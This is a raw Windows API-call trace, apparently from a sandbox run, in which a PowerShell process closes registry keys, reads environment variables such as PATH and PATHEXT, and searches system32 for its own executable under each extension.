

Thread:
	id = 280
	os_tid = 0xdfc


Thread:
	id = 536
	os_tid = 0x1384


Thread:
	id = 539
	os_tid = 0x139c


Thread:
	id = 546
	os_tid = 0x13cc


Thread:
	id = 646
	os_tid = 0x1448


Thread:
	id = 858
	os_tid = 0x1330


Thread:
	id = 863
	os_tid = 0x1058

	[0477.618] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0534.413] LocalFree (hMem=0xf72b0) returned 0x0
	[0534.413] CloseHandle (hObject=0x308) returned 1
	[0534.413] CloseHandle (hObject=0x13) returned 1
	[0534.414] CloseHandle (hObject=0xf) returned 1
	[0534.415] RegCloseKey (hKey=0x2f4) returned 0x0
	[0534.415] RegCloseKey (hKey=0x2f0) returned 0x0
	[0534.415] RegCloseKey (hKey=0x2ec) returned 0x0
	[0534.415] LocalFree (hMem=0xf7280) returned 0x0
	[0534.415] RegCloseKey (hKey=0x31c) returned 0x0
	[0545.277] RegCloseKey (hKey=0x31c) returned 0x0
	[0559.851] RegCloseKey (hKey=0x31c) returned 0x0
	[0577.730] RegCloseKey (hKey=0x388) returned 0x0
	[0577.731] RegCloseKey (hKey=0x384) returned 0x0
	[0577.731] RegCloseKey (hKey=0x360) returned 0x0
	[0577.731] RegCloseKey (hKey=0x39c) returned 0x0
	[0577.732] RegCloseKey (hKey=0x37c) returned 0x0
	[0577.732] RegCloseKey (hKey=0x378) returned 0x0
	[0577.732] RegCloseKey (hKey=0x374) returned 0x0
	[0577.732] RegCloseKey (hKey=0x370) returned 0x0
	[0577.733] RegCloseKey (hKey=0x36c) returned 0x0
	[0577.733] RegCloseKey (hKey=0x368) returned 0x0
	[0577.733] RegCloseKey (hKey=0x364) returned 0x0
	[0577.734] RegCloseKey (hKey=0x33c) returned 0x0
	[0577.734] RegCloseKey (hKey=0x398) returned 0x0
	[0577.734] RegCloseKey (hKey=0x394) returned 0x0
	[0577.734] RegCloseKey (hKey=0x35c) returned 0x0
	[0577.735] RegCloseKey (hKey=0x358) returned 0x0
	[0577.735] RegCloseKey (hKey=0x354) returned 0x0
	[0577.735] RegCloseKey (hKey=0x350) returned 0x0
	[0577.736] RegCloseKey (hKey=0x34c) returned 0x0
	[0577.736] RegCloseKey (hKey=0x348) returned 0x0
	[0577.736] RegCloseKey (hKey=0x344) returned 0x0
	[0577.736] RegCloseKey (hKey=0x340) returned 0x0
	[0577.737] RegCloseKey (hKey=0x390) returned 0x0
	[0577.737] RegCloseKey (hKey=0x330) returned 0x0
	[0577.737] RegCloseKey (hKey=0x32c) returned 0x0
	[0577.738] RegCloseKey (hKey=0x328) returned 0x0
	[0577.738] RegCloseKey (hKey=0x324) returned 0x0
	[0577.738] RegCloseKey (hKey=0x320) returned 0x0
	[0577.738] RegCloseKey (hKey=0x308) returned 0x0
	[0577.739] RegCloseKey (hKey=0x2f4) returned 0x0
	[0577.739] RegCloseKey (hKey=0x2f0) returned 0x0
	[0577.739] RegCloseKey (hKey=0x38c) returned 0x0
	[0577.739] RegCloseKey (hKey=0x31c) returned 0x0
	[0605.680] RegCloseKey (hKey=0x34c) returned 0x0

Thread:
	id = 994
	os_tid = 0x1a7c


Thread:
	id = 1177
	os_tid = 0x1784

	[0593.600] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0593.604] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0593.609] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0593.609] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.609] CoTaskMemFree (pv=0x19bfb0) 
	[0593.611] VirtualQuery (in: lpAddress=0x1cb1dd40, lpBuffer=0x1cb1ec00, dwLength=0x30 | out: lpBuffer=0x1cb1ec00*(BaseAddress=0x1cb1d000, AllocationBase=0x1c190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0593.614] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0593.614] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.614] CoTaskMemFree (pv=0x19bfb0) 
	[0593.617] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0593.617] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.617] CoTaskMemFree (pv=0x19bfb0) 
	[0593.620] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0593.620] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.620] CoTaskMemFree (pv=0x19bfb0) 
	[0593.636] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0593.636] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.636] CoTaskMemFree (pv=0x19bfb0) 
	[0593.639] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0593.639] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.639] CoTaskMemFree (pv=0x19bfb0) 
	[0593.640] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0593.640] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.640] CoTaskMemFree (pv=0x19bfb0) 
	[0594.738] VirtualQuery (in: lpAddress=0x1cb1dff0, lpBuffer=0x1cb1eeb0, dwLength=0x30 | out: lpBuffer=0x1cb1eeb0*(BaseAddress=0x1cb1d000, AllocationBase=0x1c190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0594.739] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0594.739] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0594.739] CoTaskMemFree (pv=0x19bfb0) 
	[0594.742] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0594.742] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0594.742] CoTaskMemFree (pv=0x19bfb0) 
	[0594.742] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0594.742] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0594.742] CoTaskMemFree (pv=0x19bfb0) 
	[0594.744] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0594.744] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0594.744] CoTaskMemFree (pv=0x19bfb0) 
	[0594.748] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0594.748] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0594.748] CoTaskMemFree (pv=0x19bfb0) 
	[0595.759] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0595.759] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0595.759] CoTaskMemFree (pv=0x19bfb0) 
	[0595.762] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0595.762] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0595.762] CoTaskMemFree (pv=0x19bfb0) 
	[0595.763] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0595.763] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0595.763] CoTaskMemFree (pv=0x19bfb0) 
	[0595.766] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0595.766] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0595.766] CoTaskMemFree (pv=0x19bfb0) 
	[0595.768] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0595.768] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0595.768] CoTaskMemFree (pv=0x19bfb0) 
	[0595.769] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0595.769] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0595.769] CoTaskMemFree (pv=0x19bfb0) 
	[0595.771] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0595.771] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0595.771] CoTaskMemFree (pv=0x19bfb0) 
	[0596.753] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0596.753] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0596.753] CoTaskMemFree (pv=0x19bfb0) 
	[0597.909] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0597.909] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0597.909] CoTaskMemFree (pv=0x19bfb0) 
	[0597.912] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0597.912] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0597.912] CoTaskMemFree (pv=0x19bfb0) 
	[0597.912] CoTaskMemAlloc (cb=0x128) returned 0x156620
	[0597.912] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x156620, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0597.912] CoTaskMemFree (pv=0x156620) 
	[0597.917] CoTaskMemAlloc (cb=0x20e) returned 0x1ac3a0
	[0597.917] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1ac3a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0597.917] CoTaskMemFree (pv=0x1ac3a0) 
	[0598.928] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0598.929] SetErrorMode (uMode=0x1) returned 0x1
	[0598.932] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0598.945] SetErrorMode (uMode=0x1) returned 0x1
	[0598.946] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0598.950] SetErrorMode (uMode=0x1) returned 0x1
	[0598.950] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0598.958] SetErrorMode (uMode=0x1) returned 0x1
	[0598.959] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0598.960] SetErrorMode (uMode=0x1) returned 0x1
	[0598.960] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0600.233] SetErrorMode (uMode=0x1) returned 0x1
	[0600.234] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0600.234] SetErrorMode (uMode=0x1) returned 0x1
	[0600.234] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0600.244] SetErrorMode (uMode=0x1) returned 0x1
	[0600.245] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0600.245] SetErrorMode (uMode=0x1) returned 0x1
	[0600.245] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0600.253] SetErrorMode (uMode=0x1) returned 0x1
	[0600.255] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0600.255] SetErrorMode (uMode=0x1) returned 0x1
	[0600.255] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0600.263] SetErrorMode (uMode=0x1) returned 0x1
	[0600.264] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0600.264] SetErrorMode (uMode=0x1) returned 0x1
	[0600.264] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0600.272] SetErrorMode (uMode=0x1) returned 0x1
	[0600.274] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0600.274] SetErrorMode (uMode=0x1) returned 0x1
	[0600.274] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0601.908] SetErrorMode (uMode=0x1) returned 0x1
	[0601.909] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0601.910] SetErrorMode (uMode=0x1) returned 0x1
	[0601.910] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0601.918] SetErrorMode (uMode=0x1) returned 0x1
	[0601.919] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0601.920] SetErrorMode (uMode=0x1) returned 0x1
	[0601.920] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0601.928] SetErrorMode (uMode=0x1) returned 0x1
	[0601.929] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0601.929] SetErrorMode (uMode=0x1) returned 0x1
	[0601.930] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0601.940] SetErrorMode (uMode=0x1) returned 0x1
	[0601.941] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0601.942] SetErrorMode (uMode=0x1) returned 0x1
	[0601.942] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.294] SetErrorMode (uMode=0x1) returned 0x1
	[0603.295] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0603.295] SetErrorMode (uMode=0x1) returned 0x1
	[0603.296] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.304] SetErrorMode (uMode=0x1) returned 0x1
	[0603.305] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0603.305] SetErrorMode (uMode=0x1) returned 0x1
	[0603.305] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.313] SetErrorMode (uMode=0x1) returned 0x1
	[0603.315] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0603.315] SetErrorMode (uMode=0x1) returned 0x1
	[0603.315] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.323] SetErrorMode (uMode=0x1) returned 0x1
	[0603.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0603.325] SetErrorMode (uMode=0x1) returned 0x1
	[0603.325] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.326] SetErrorMode (uMode=0x1) returned 0x1
	[0603.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0603.326] SetErrorMode (uMode=0x1) returned 0x1
